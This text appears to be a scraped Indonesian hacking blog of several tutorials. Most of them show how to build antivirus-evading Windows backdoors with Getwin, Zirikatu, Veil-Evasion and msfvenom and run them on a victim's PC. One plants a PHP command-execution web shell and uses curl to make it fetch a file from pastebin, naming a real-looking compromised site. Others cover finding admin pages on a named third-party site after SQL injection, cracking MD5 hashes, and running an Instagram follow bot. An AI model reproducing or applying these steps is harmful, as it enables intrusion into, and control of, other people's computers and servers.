Maxteroit: Tools

Getwin adalah sebual tools untuk membuat backdoor yang dijalankan pada Linux. berikut selengkapnya tentang Getwin - FUD Win32 Payload Generator Dan Listener.

Legal disclaimer:

Penggunaan GetWin untuk menyerang target tanpa persetujuan bersama sebelumnya adalah ilegal. Merupakan tanggung jawab pengguna akhir untuk mematuhi semua hukum setempat, negara bagian, dan federal. Pengembang tidak bertanggung jawab dan tidak bertanggung jawab atas penyalahgunaan atau kerusakan yang disebabkan oleh program ini.

Fitur Getwin

  • FUD: Fully Undetectable (Sepenuhnya Tidak Terdeteksi)
  • Tidak Perlu mengkonfigurasi penerusan port, atau menginstal program lain, hanya menggunakan ssh dan serveo.net.

Penggunaan

git clone https://github.com/thelinuxchoice/getwin
cd getwin
bash getwin.sh

Install Requirements (mingw-w64):

sudo apt-get install mingw-w64

Getwin - FUD Win32 Payload Generator Dan Listener

Hari ini dengan senang hati Bitdefender mengumumkan bahwa kolaborasi Bitdefender dengan Polisi Rumania, Europol dan lembaga penegak hukum lainnya telah menghasilkan decryptor baru untuk semua versi ransomware GandCrab yang dirilis sejak Oktober 2018.

Grancab Decryptor V5.1 Terbaru Dari Bitdefender

GandCrab Decryptor Versi 5.1

Jika Anda butuh decrypt versi 1, 4 dan hingga 5.1, kemudian unduh dan jalankan di link berikut ini:


Lab Bitdefender pada Kasus ini

Ketika GandCrab mulai melonjak di peta ancaman pada Januari 2018, Bitdefender merilis decryptor gratis pertama untuk membantu para korban mengambil kehidupan digital mereka kembali. Lebih dari 2.000 pengguna rumahan, perusahaan, dan nirlaba menggunakannya untuk mengambil data mereka yang hilang dan menghindari membayar jutaan tebusan.

Tentang Serangan GandCrab

Sepuluh bulan kemudian, Bitdefender merilis decryptor lain untuk memperluas dukungan ke GandCrab versi 1, 4 dan 5 hingga 5.0.3. Sejak itu, Bitdefender dihubungi oleh dan tetap berhubungan dengan ribuan korban yang mencari bantuan.

Meskipun ini adalah ketiga kalinya Bitdefender mengalahkan enkripsi GandCrab dalam setahun terakhir, perayaan Bitdefender akan berumur pendek. Bitdefender akan kembali bekerja besok, karena operator GandCrab tidak diragukan lagi akan mengubah taktik dan teknik.

GandCrab telah menimbulkan kerugian jutaan dolar secara global sejak kemunculannya, dan sekarang merupakan salah satu keluarga ransomware yang paling umum di pasaran. Sejak dekripsi pertama kami, secara agregat kami telah membantu hampir 10.000 korban menghemat lebih dari $ 5 juta dolar dalam biaya dekripsi hampir 20.000 korban menghemat minimum $ 18 juta dolar AS pada akhir Februari:.


Tahun lalu, beberapa afiliasi GandCrab mulai menyerang organisasi melalui contoh Remote Desktop Protocol yang terbuka, atau dengan langsung masuk dengan kredensial domain curian. Setelah mengautentikasi pada PC yang disusupi, penyerang secara manual menjalankan ransomware dan memerintahkannya untuk menyebar ke seluruh jaringan. Setelah jaringan terinfeksi, penyerang menghapus jejak mereka dan menghubungi korban dengan tawaran dekripsi.

Baru-baru ini, operator GandCrab juga telah mulai mengirimkan ransomware ke perusahaan melalui kerentanan dalam perangkat lunak dukungan TI jarak jauh yang digunakan oleh penyedia layanan terkelola untuk mengelola workstation pelanggan.

Baca Juga : Atasi Ransomware Rumba

Kegigihan ini adalah alasan pencegahan sangat penting. Jika Anda memiliki solusi keamanan, pastikan itu baru dan memiliki pertahanan yang berlapis terhadap ransomware. Semakin baik deteksi, semakin rendah kemungkinan infeksi Anda. Pastikan juga Anda menjalankan versi terbaru OS dan perangkat lunak pihak ketiga.

Jika Anda tidak memiliki solusi keamanan, dapatkan solusi sekarang. Itu sangat membantu, dan itu jauh lebih murah daripada pembayaran tebusan $ 600.

Hentikan apa pun yang Anda lakukan dan buat dan verifikasi cadangan eksternal dari data penting Anda. Jika terjadi bencana, Anda akan memiliki salinan untuk dikembalikan.

Jika tidak, Bitdefender dan lembaga penegak hukum mitra menyarankan korban untuk menolak tuntutan operator ransomware. Sebagai gantinya, buat cadangan informasi yang dienkripsi dan segera beri tahu polisi. Dan ikuti kami di sini untuk pembaruan.

Cara Menghapus Ransomware GanCrab dengan GanCrab Decryptor V5.1

Bugreport - Tools Untuk Report Bug

Melaporkan sebuah bug atau celah keamaan adalah hal yang biasa dilakukan oleh para BugHunter/Pentester. Dengan melaporkan sebuah bug yang ada biasanya mereka para BugHunter di hadiahi sebuah reward yang beragam,  dari mulai dari sejumlah uang,piagam, sertifikat, merchandise dll.

Tools yang bernama Bugreport ini adalah sebuah tools untuk melaporkan bug kepada email dev/admin website melalui email, jadi bukan sebuah tools untuk pentest ya. Biasanya mereka melaporkan sebuah bug melalui aplikasi emailnya langsung dengan tools ini kamu bisa melaporkannya melalui email tapi via CLI yang dijlankan di terminal Linux kamu.

Instalasi Bugreport di Termux

$ pkg install python
$ git clone https://github.com/marioyhzkiell/bugreport.git
$ cd bugreport
$ chmod 777 bugreport.py


Menjalankan Bugreport

Untuk menjalakannya masukan perintah berikut:
$ python bugreport.py

Akhir kata

Semoga artikel kali ini bermanfaat buat kamu para pembaca setia Maxteroit ya. nantikan artikel menarik lainnya di Maxteroit.

Bugreport - Tools Untuk Report Bug

Cara Membuat Tools Sendiri (Subdomain Finder)

Maxteroit

Tools Sendiri

Orang-orang penggiat hacking mana sih yang tidak ingin bisa membuat tools hacking sendiri ?
100 dari 100 orang para hackerWannabe ingin membuat tools sendiri (Hasil Riset Sendiri ya :D), baik seperti trojan generator, scanner, dan mungkin seperti postingan kita satu ini yaitu Tools Subdomain Finder.
Ya.. Tools untuk mencari subdomain aktif pada website yang ditentukan sesuai selera,
oke langsung saja ke pembahasannya.

Tools Intro

Tools yang akan kita buat ini menggunakan bahasa pemrograman Python dan versi yang digunakannya yaitu python versi 2.7 (Untuk para coder yang terbiasa menggunakan python3, bisa menyesuaikan).

Why Python ?

1. Module/Librarynya sangat banyak untuk kita membuat sebuah tools
2. Tentunya bahasa python ini mudah digunakan
3. Yang pasti tidak terlalu bergantung pada semicolon xD xD

Alur Tools

Mudah saja sih sebenarnya, kita hanya membutuhkan 1 module sebagai tumpuan dari tools kita satu ini yaitu menggunakan module requests.
Dengan module ini dapat menangani request dengan method GET, POST, PUT, HEAD, OPTION dan DELETE.
Dan pada tutorial ini, kita akan menggunakan salah satu method yaitu menggunakan method GET.
Penasaran ? Oke kita langsung ke proses pembuatannya.


Start Coding

Saya asumsikan kalian sudah siap dengan senjata kalian yaitu text editor masing-masing, dan ada pemahaman dengan bahasa python.

1. Pada baris paling atas, kita ketikkan dulu module/library apa yang akan digunakan, dan module yang digunakan yaitu requests, seperti berikut :
import requests

2. Selanjutnya membuat fungsi atau method baru, bebas kalian kasih nama method, disini saya menggunakan nama method rikues, lalu wajib diawali dengan syntax def seperti berikut :
def rikues(url):

3. Lalu tambahkan syntax berikut didalam fungsi rikues(): seperti berikut :
try:
 return requests.get("http://"+url)
except requests.exceptions.ConnectionError:
 pass

4. Selanjutnya kita tambahkan variabel string yang berisikan target yang akan kita scan, misal disini kita akan memilihi domain google.com sebagai target, variable tersebut simpan diluar fungsi rikues tadi, ketikkan seperti berikut :
target_url="google.com"

5. Karna tools ini menggunakan teknik bruteforce atau lebih tepatnya dictionary attack, maka kita membutuhkan wordlist subdomain, bisa langsung comot :

1.  https://raw.githubusercontent.com/maxteroit/MaxSubdoFinder/master/small.txt  (500+ list)
2.  https://raw.githubusercontent.com/maxteroit/MaxSubdoFinder/master/subdomain.list (500k+ list)

6. Setelah mempunyai wordlistnya, selanjutnya ketikkan syntax berikut sebagai fungsi bruteforcenya:
with open("lokasiwordlistmu","r") as wordlist_file:
 for line in wordlist_file:
  word=line.strip()
  test_url=word+"."+target_url
  response = requests(test_url)
  if response:
   print("Subdomain Ditemukan")

7. Dan jika kita gabungkan semua sintaksna, maka akan menjadi seperti ini :

import requests

def rikues(url):
 try:
  return requests.get("http://"+url)
 except requests.exceptions.ConnectionError:
  pass

target_url="google.com"

with open("lokasiwordlistmu", "r") as wordlist_file:
 for line in wordlist_file:
  word=line.strip()
  test_url=word+"."+target_url
  response = rikues(test_url)
  if response:
   print("Subdomain Ditemukan >> "+test_url)

8. Setelah semua diketik, lalu kita save menjadi file python yaitu dengan ekstensi .py misal maxteroit.py.



9. Setelah itu, kita coba run file maxteroit.py tadi, sehingga akan menjadi seperti berikut :



Untuk contoh yang agak bagusan dikit dari sintaks diatas adalah bisa kalian cek di githubnya langsung yaitu :

https://github.com/maxteroit/MaxSubdoFinder

Jika ingin ada yang ditanyakan, bisa komen dikolom komentar yang telah disediakan atau kontak langsung lewat Fanspage : Maxteroit

Cara Membuat Tools Sendiri (Subdomain Finder)

Redhawk Powerful Information Gathering Tools and Vulnerability Scanning

 

Redhawk, Powerful Information Gathering and Vulnerability Scanning Tools

Ok, in this post, i would like to review powerful tools for Information Gathering and Vulnerability Scanning, its tool called RedHawk , ok let's try it.

#Installing

1. I will use Git Clone methods from GitHub;
use this command :
git clone https://github.com/Tuhinshubhra/RED_HAWK.git
2. Next, enter the directory by command cd .

3. Look at this picture :


there is no permission for executing that file, so we must change mod for the file, use this command :
chmod +x rhawk.php

#Running

1. Command :
php rhawk.php

2.  Ok, after you run this tool, for the first time, you must enter a website domain, for example, i use my domain website www.maxteroit.com :


3. Choose HTTP or HTTPS of that website :


4. And then, Menu tools will be printed :


Ok I will try 1 Scanner, i choose Blogger View Scanner, and the result is :


Just that tutorials from me, and if you find an error in the script, you can ask me in the comment, or mail me [email protected]
Thank's

Redhawk Powerful Information Gathering and Vulnerability Scanning Tools

Crack / Decrypt MD5 Hashes using Rainbow Table

Crack / Decrypt MD5 Hashes using Rainbow Table

Crack / Decrypt MD5 Hashes using Rainbow Table

Hello everyone, in this tutorial, i would like to give method how to crack, encrypt MD5 hashes using rainbow table.

What is Rainbow Table ?

rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a password (or credit card numbers, etc.) up to a certain length consisting of a limited set of characters. It is a practical example of a space–time tradeoff, using less computer processing time and more storage than a brute-force attack which calculates a hash on every attempt, but more processing time and less storage than a simple lookup table with one entry per hash. Use of a key derivation function that employs a salt makes this attack infeasible.
source : Wikipedia

so.. we can conclude what is rainbow table by this image :


Confused ? yha haha same with me, lol.
Alright, you will understand after watching this video :


Let's start

OK, after you read the explanation, watch that video... so it's time to try it.

If you use Windows, choose for Windows,
If you use Linux, choose for windows, hahah i mean Linux
In this tutorial, im using Rainbow Crack for Linux.

2. After Downloaded, unzip the Rainbow and go to that directory, see :


Crack / Decrypt MD5 Hashes using Rainbow Table


Not allow for execute the script ? type this command :
chmod +x rcrack rtgen rtsort

Now we have access to execute that script/program.
Waitt..... before running rtcrack script like that videos, you must have Rainbow Table first :).

Creating Rainbow Tables

Alright, before your create Rainbow Tables, you should see charset.txt, like this one :


Understand it ? must !
numeric                    = [0123456789]
alpha                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
alpha-numeric          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
loweralpha                = [abcdefghijklmnopqrstuvwxyz]
loweralpha-numeric = [abcdefghijklmnopqrstuvwxyz0123456789]
mixalpha                  = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-numeric    = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ascii-32-95                  = [ !"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`abcdefghijklmnopqrstuvwxyz{|}~]
ascii-32-65-123-4            = [ !"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`{|}~]
alpha-numeric-symbol32-space = [[email protected]#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
If you are lazy to create Rainbow table (it can take your times and make your computer hot)
you can download from my repository :

https://github.com/maxteroit/RainbowTable-alpha

or clone from my repository, use this command :
git clone https://github.com/maxteroit/RainbowTable-alpha.git 
 After cloning my repo, move all file (exc Readme.md) to directory which you save the Rainbowcrack files.

How to create Rainbow Table ?

Start creating Rainbow Table, use this command :
In here, im creating alpha charset for my rainbow table...
./rtgen md5 alpha 1 7 0 2100 8000000 all
The command means having the md5 hash type , plaintext length range 1 - 7, plaintext total 8353082582.

On process..


You can change plaintext range, plaintext total :).
If it done, you must short the rainbow table first, like this :
./rtsort .


 Ok, after that, run ./rcrack like the video, but wait, provide the md5 hash, or you can use my md5 :
ea1a3df96ef7de460929eecb5c521bad
Let's check in hashkiller.co.uk that my md5 hash :)
and the result is :

Not Found :p

Let's crack with our Rainbow Table and Rainbow Crack :D

Start cracking / decrypting MD5

Use this command :
./rcrack . -h ea1a3df96ef7de460929eecb5c521bad

Andd the result is.... CRACKEDDDD DECRYPTEDDD



Crack / Decrypt MD5 Hashes using Rainbow Table

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2




Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2 akhirnya saya post :D dan yang pasti masih berhubungan dengan judul yang saya cantumkan diatas yha :D.

Link Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2 :


https://www.maxteroit.com/2018/07/kumpulan-ebook-hacking-programming-networking-blogging-security.html

Seperti biasa, pemanis....

(Google Haking For Penetration Testing - 529 Pages)



(Metasploit Penetration Testing Cookbook - 269 Pages)



Oke berikut list Ebook Koleksi babang Maxteroit Part 2 :


2.Ebook Google Secrets - How To Get A Top 10 Ranking - 112 Pages

3.Ebook Gray Hat Hacking - 721 Pages

4.Ebook Metasploit The Penetration Testers Guide - 332 Pages

5.Ebook Nmap 6_ Network Exploration and Security Auditing Cookbook - 318 Pages

6.Ebook Nmap Essentials - 118 Pages

7.Ebook nmap-cookbook-the-fat-free-guide-to-network-scanning - 198 Pages

8.Ebook Penetration Testing with the Bash shell - 151 Pages

9.Ebook PHP for Absolute Beginners, 2nd Edition - 236 Pages

10.Ebook Practical Malware Analysis - 802 Pages

11.Ebook Practical Reverse Engineering - 383 Pages

12.Ebook The Art of Memory Forensics - 914 Pages

13.Ebook Windows Sysinternals Administrators Reference - 497 Pages

14.Ebook windows-command-line-administration - 578 Pages

Nah Mungkin baru segitu dulu saja koleksi Ebook saya yang bisa share dipost ini..
Dan di post selanjutnya, saya akan share Ebook mengenai Ethical Hacking
Jangan sungkan untuk bertanya atau meminta sesuatu pada saya :D , sobat bisa hubungi saya ke email === > [email protected]
Terima Kasih  

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 2

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1



Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1 - Ebook mengenai Hacking, Programming, Networking & Security sudah bertebaran di Internet, yap seperti di Blog Ini :D Maxteroit tercinta. Berhubungan banyak yang request mengenai Upload Ebook-ebook yang saya punya :'D  (permintaan dari teman FB) , dengan begitu saya dengan senang hati share koleksi-koleksi ebook yang saya punya, berikut screenshotnya :

(GrayHat Hacking-721 pages)


(Practical Reverse Engineering-383 pages)


Nah itu baru secuil aj :D, 
Berikut Nama sekaligus Linknya :














Itulah Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1 ,
Penasaran dengan 2 Sampel diatas bukan ? 
tunggu di update-an selanjutnya yha, jgn lupa subscribe, atau jika ingin minta langsung, bisa hubungi saya via email =====> [email protected]

Untuk Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1, segitu dulu yha :'p
thx

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1

Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)


Jika sebelumnya saya bahas hack windows  dengan msfvenom biasa (tanpa bantuan apapun, tapi kali ini saya akan share tutorial bagaimana Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD).

Baca Juga :
Cara Membuat Backdoor Fud Menggunakan Veil-Evasion
Hack Windows Beda Jaringan Menggunakan Metasploit 

Oke langsung saja ke tutorial utamanya, cekidot.....

Download terlebih dahulu zirikatunya di github, bisa clone, bisa juga didownload langsung (dalam format zip) di link berikut
https://github.com/pasahitz/zirikatu

Jika sudah didownload, silahkan ekstrak file zirikatunya tadi, lalu buka folder yg sudah diekstrak menggunakan terminal, seperti berikut.....


Lalu jalankan tool Zirikatunya :


Disana terdapat beberapa pilihan, bisa kalian coba-coba sendiri, disini saya memilih pilihan yang nomor 3, yaitu Meterpreter_Reverse_https

Selanjutnya :
Set LHOST-nya, karena disini hanya jangkauan lokal, kita gunakan ip lokal kita, bisa dilihat dengan menggunakan perintah
ifconfig

Lalu set LPORT kita, kalian bisa set bebas berapapun angkanya, (karna lokal).
Untuk langkah  selanjutnya, bisa menyesuaikan....


Nah disana ada pertanyaan blablabla, kita yes kan saja, agar langsung masuk ke msfconsole dan si Zirikatunya sendiri sudah men-set sesuai dengan payload yang sudah kita buat, kita hanya tinggal menjalankan backdoornya di OS korban :D

Ok kita jalankan backdoornya..

(Sebelum Backdoor dieksekusi)

(Sesudah Dieksekusi).

Untuk lebih jelasnya, bisa disimak langsung lewat video berikut :

link =====> https://www.youtube.com/watch?v=i8cInI46fRQ



Ok sekian saja tutor saya :D ,
ouh iyha, untuk yang beda jaringan-nya akan menyusul, masih banyak tugas kuliah xixixixi.

Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)


Akses Shell, Bukan Download! - Shell Backdoor dalam computer security system ,merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Salah satu cara mananamkan shell backdoor pada server adalah dengan metode  JQuery File Upload, tapi pernahkah kalian melakukan cara ini namun saat meng-akses shell, shell backdoor kalian malah ter-download? Oke, kita bahas solusinya.


  • .htaccess
Salah satu penyebab shell malah ter-download adalah htaccess. Apa itu htaccess? .htaccess adalah file untuk merubah beberapa konfigurasi untuk mengarahkan pada web server Apache.

AddType application/octet-stream .php

Lalu bagaimana solusinya? Solusinya adalah me-replace htaccess server dengan htaccess kita sendiri.

Bagaimana caranya??

  • 1. Siapkan file .php berisi script berikut,
<?php passthru($_POST['cmd']); __halt_compiler(); ?>
  • 2. Upload ke server korban.
  • 3. Buka termninal, ketikkan perintah,
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" urlshell
contoh:
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" http://maxteroit.com/shell.php


  • 4. Upload shell dengan format .berandal > contoh: shell.berandal
Contoh hasil upload:  
https://www.hicinko.com/cruisecms/public/uploadcontent/server/php/files//kecil.berandal

Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.

Terima Kasih,
Berandal. 

Akses Shell, Bukan Download!


XSSSNIPER is an handy xss discovery tool with mass scanning functionalities.

Usage:
Usage: xsssniper.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     target URL
  --post                try a post request to target url
  --data=POST_DATA      post data to use
  --threads=THREADS     number of threads
  --http-proxy=HTTP_PROXY
                        scan behind given proxy (format: 127.0.0.1:80)
  --tor                 scan behind default Tor
  --crawl               crawl target url for other links to test
  --forms               crawl target url looking for forms to test
  --user-agent=USER_AGENT
                        provide an user agent
  --random-agent        perform scan with random user agents
  --cookie=COOKIE       use a cookie to perform scans
  --dom                 basic heuristic to detect dom xss

Examples:
Scanning a single url with GET params:
$ python xsssniper.py -u "http://target.com/index.php?page=test"
Scanning a single url with POST params:
$ python xsssniper.py -u "http://target.com/index.php" --post --data=POST_DATA
Crawl a single url looking for forms to scan:
$ python xsssniper.py -u "http://target.com" --forms
Mass scan an entire website:
$ python xsssniper.py -u "http://target.com" --crawl
Mass scan an entire website forms included:
$ python xsssniper.py -u "http://target.com" --crawl --forms
Analyze target page javascripts (embedded and linked) to search for common sinks and sources:
$ python xsssniper.py -u "http://target.com" --dom


XSSSNIPER


Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet. Banyak sekali cara mengganti tampilan header terminal di Mac OS X. Misalnya, kita bisa menggunakan Figlet atau Cowsay atau yang lainnya. Kali ini kita bahas Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet.

Baca Juga: Kumpulan Video Pembelajaran Pentesting Menggunakan Kali Linux

Figlet adalah sebuah program komputer yang menghasilkan teks spanduk, dalam berbagai tipografi, terdiri dari huruf-huruf terbuat dari kecil konglomerasi ASCII karakter (lihat ASCII art).Diantar kalian mungkin bosen dengan tampilan terminal yang hanya sebuah tempat hitam kosong.

Cara paling cepat untuk meng-install Figlet adalah menggunakan HomeBrew. Kalian bisa meng-install homebrew dengan perintah:

 ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)”

Setelah itu kalian install figlet, dengan mengetik perintah:

brew install figlet

Ketika Figlet sudah ter-install, kalian bisa melihat semua font yang tersedia di sana dengan mengetik perintah:

showfigfonts

Ketika kalian udah selesai memilih font, ketik kata yang kalian inginkan, disini saya contoh kan:

showfigfonts "Maxteroit"

Setelah itu, copy text ASCII yang kalian inginkan. Nah, untuk mengganti tampilan header terminal kalian, ketikkan perintah:

sudo pico /etc/motd

Paste text ASCII yang kalian copy tadi. Lalu tekan Control+O (Overwrite) untuk menyimpan. Lalu Control+X untuk keluar.

Buka terminal baru dan header kalian sudah berubah!

Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet

Menambah Follower Dengan Instagram Private Tools Termux
Ini bukanlah hack followers instagram lewat termux tetapi cara termudah untuk mendapatkan atau menambah follower instagram secara tertarget di termux. cara menambah followers instagram lewat termux ini sangat mudah dilakukan walaupun kamu baru tau termux, banyak sekali menambah followers instagram lewat termux tapi tool ini lah yang menurut saya paling bagus, tool Instagram ini telah saya update link reponya dan bisa digunakan kembali, bagi yang belum tau saya jelaskan sedikit fungsi tool ini. Jadi jika ada tutorial yang mengatakan hack followers instagram termux itu bohong, tidak ada unsur hackingnya, jadi sekali lagi ini bukan hack followers instagram lewat termux. Ini lebih tepatnya adalah trik menambah followers intagram dengan cepat lewat termux.

Instagram Private Tool ini berfungsi mencari followers sesuai target yang kamu mau, walaupun sistemnya masih sama yaitu follow unfollow tapi ini bisa dilakukan secara otomatis, kamu hanya perlu setting saja dan tool ini otomatis menjalakan "pekerjaan"nya. Simak tahapan cara menambah followers instagram di termux.

Install Instagram Private Tool Termux Untuk Menambah Followers

Saya sudah update tutorial yang lebih lengkap disini Hack Follower Instagram dengan Termux

Fitur Instagram Private Tool Termux :

  1. Unfollow not Followback
  2. Unfollow all Following
  3. Delete all media
  4. Follow Followers Target
  5. Bom Like Media Target
  6. Follow Account By Hashtag

Thanks To CCOCOT (https://web.facebook.com/Ccocot)For Making this tools.

kelebihan tool ini kamu bisa menargetkan follower kamu sesuai dengan hashtag, dan follower kamu pun follower aktif pastinya, jika following kamu sudah banyak kamu bisa tuh gunakan fitur "Unfollow all Following" atau "Unfollow not Followback".

Cara menambah followers instagram lewat termux ini bisa kamu lakukan berulang-ulang dan bisa di tinggal, hanya perlu sedikit settingan lalu jalankan.

Menambah Followers Dengan Instagram Private Tools Termux

Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.

Cara Mencari Halaman Login Admin

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

 


Hello everyone, nah sesuai janji gw kemarin, gw bakalan share bagaimana Cara Membuat Backdoor FUD Menggunakan Veil-evasion. Oke veil-evasion yg kita gunain yaitu veil versi 2.28.2, kalian tinggal menyesuaikan saja :) , tanpa basa basi, kita langsung saja bahas tutorialnya.

Baca juga :

Jika belum mempunyai veil-evasion, kita bisa langsung install lewat terminal dengan perintah :
apt-get install veil-evasion

Oke kalo sudah terinstall, tinggal run saja veil evasionnya,

1.  untuk melihat jenis-jenis payload yg tersedia, kita ketikkan perintah berikut
list

2. setelah itu akan muncul beberapa jenis list payload yg bisa kita gunakan, pada versi veil kita, ada 51 jenis payload yg bisa kita buat, disini kita menggunakan payload yg bernomor 49, lalu kita ketik perintah :
use 49

karena payload yg kita gunakan bernomor 49.

3. Setelah itu kita set LHOST dan LPORT kita seperti biasanya.
kita set Lhost dulu dengan perintah :
set LHOST 192.x.x.x

LHOST tersebut silahkan sesuaikan dengan ip kalian, mau lokal, atau publik, terserah,

4. Lalu jika ingin mengatur port, kalian juga bisa atur sesuka hati, tp karna tutor berikut untuk lokal, saya membiarkan port tersebut default, yaitu 4444

5. Untuk melihat detail info yg telah kita atur, kalian bisa mengetikkan perintah :
info

disana akan muncul deskripsi payload yg akan kita generate

6. Jika sudah sesuai keinginan, tinggal kita generate saja payloadnya dengan perintah
generate

7. Setelah itu kita akan disuruh memberi nama payload kita, yha kalian isi saja sesuai keinginan dan kebutuhan kalian ^_^

8. jika generate sudah selesai, lokasi payload yg telah kita buat lokasinya ada di : /usr/share/veil-output/compiled/namapayloadkalian.exe

9. Handler file kita berlokasi di : /usr/share/veil-output/namapayload_handler.rc
 (silahkan copy saja lokasi itu seperti gambar berikut


10. Lalu buat tab baru untuk tab msfconsolenya dan ketikkan perintah :
msfconsole -r /usr/share/veil-output/handler/namapayloadkalian_handler.rc

ket : setelah dir "handler", tinggal pastekan kan saja yg telah kita copy sebelumnya :)

11. Setelah itu tinggal copy kan saja Payload/backdoor yg telah kita buat pada korban kita :) lalu Run payload kita, dan sesi meterpreter pun akan terbuka ^^

12. Setelah terbuka, terserah kalian mau kalian apakan :'v, jika kurang jelas, berikut video tutorialnya

berikut linknya : https://www.youtube.com/watch?v=LF9Zi_jg7uA

Sekian saja Tutorial dari Maxteroit, mohon maaf jika ada kekurangan, jika ada yg masih tidak jelas silahkan tanyakan di kolom komentar, terima kasih :)

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

Hello gaisss selamat siang :v
Di sini gua sebagai member maxteroit.com mau memberikan sedikit tutorial tentang "Cara Menyisipkan Backdoor ke File EXE" ya udah ndak usah banyak cing cong :v

Alat dan Bahan:

  1. Distro Linux ( distro pentest sangat di sarankan :D )
  2. Metasploit (msfvenom dan msfconsole)
  3. Brain :v
Langsung eksekusi aja :v

  1. Pilih salah satu aplikasi yang mau di sisipin backdoor
  2. Nah di sini gua menggunakan yumi.exe
  3. Lalu masukin command di bawah (untuk 32bit atau x86)
  4. sudo msfvenom -a x86 --platform windows -x "yumi.exe" -k -p windows/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 -e x86/shikata_ga_nai "\x00" -f exe -o "yumibackdoor.exe"
    Lihat gambar kalau kurang jelas
  5. atau command di bawah ini (untuk 64 bit atau x64)
  6. sudo msfvenom -a x64 --platform windows -x "yumi.exe" -k -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.252 LPORT=8080 "\x00" -f exe -o "yumibackdoor.exe"
  7. Isi LHOST dengan IP agan masing"
  8. Isi LPORT dengan port yang akan di gunakan isi terserah boleh
  9. Enter dan masukkan password akun, jika selesai muncul log seperti gambar
  10. Sekarang jalanin metasploitnya dengan konfigurasi berikut
  11. Ingat LHOST dan LPORT isi punya agan sendiri :D
  12. Nah lalu pindah tuh ke PC korban :D
  13. Setelah di buka dan mendapat SESSION cepat cepat migrate ke exploler.exe
  14. Selamat Mengeksploitasi PC korban :v

Menyisipkan Backdoor ke File EXE

Subscribe Our Newsletter